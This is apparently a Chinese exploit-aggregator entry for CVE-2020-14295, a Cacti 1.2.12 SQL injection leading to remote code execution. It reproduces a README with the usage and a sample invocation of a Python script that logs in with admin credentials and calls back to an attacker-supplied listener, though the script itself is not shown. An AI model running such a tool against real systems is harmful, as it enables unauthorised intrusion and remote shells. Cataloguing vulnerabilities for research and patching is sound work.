POC详情: a7fddda4d6b50ca08160dc068ff5b41b2f5b5fb0

来源
关联漏洞
标题: Cacti SQL注入漏洞 (CVE-2020-14295)
描述:Cacti是Cacti团队的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据,使用RRDtool绘画图形进行分析,并提供数据和用户管理功能。 Cacti 1.2.12版本中的color.php文件存在SQL注入漏洞。远程攻击者可借助‘filter’参数利用该漏洞执行任意命令。
描述
Proof of Concept for CVE-2020-14295.
介绍
# CVE-2020-14295
CVE-2020-14295 proof of concept. The original post can be found at [exploit-db](https://www.exploit-db.com/exploits/49810).

## Install requirements
```
python3 -m pip install -r requirements.txt
```

## Usage
```
$ python3 cacti_sqli_rce.py --help
usage: cacti_sqli_rce.py [-h] -t <target/host URL> -u <user> -p <password>
                         --lhost <lhost> --lport <lport>

[*] Cacti 1.2.12 - SQL Injection / Remote Code Execution

optional arguments:
  -h, --help            show this help message and exit
  -t <target/host URL>  target/host URL, example: http://192.168.15.58
  -u <user>             user to log in
  -p <password>         user's password
  --lhost <lhost>       your IP address
  --lport <lport>       your listening port
```

```
$ python3 cacti_sqli_rce.py -t http://cacti-test.localdomain -u admin -p password --lhost 127.0.0.1 --lport 9001
```

## References
* [GitHub Issue](https://github.com/Cacti/cacti/issues/3622)
* [NIST](https://nvd.nist.gov/vuln/detail/CVE-2020-14295)
* [MITRE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14295)
文件快照

[4.0K] /data/pocs/a7fddda4d6b50ca08160dc068ff5b41b2f5b5fb0 ├── [ 24M] cacti-1.2.12.tar.gz ├── [3.2K] cacti_sqli_rce.py ├── [1.1K] README.md └── [ 149] requirements.txt 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。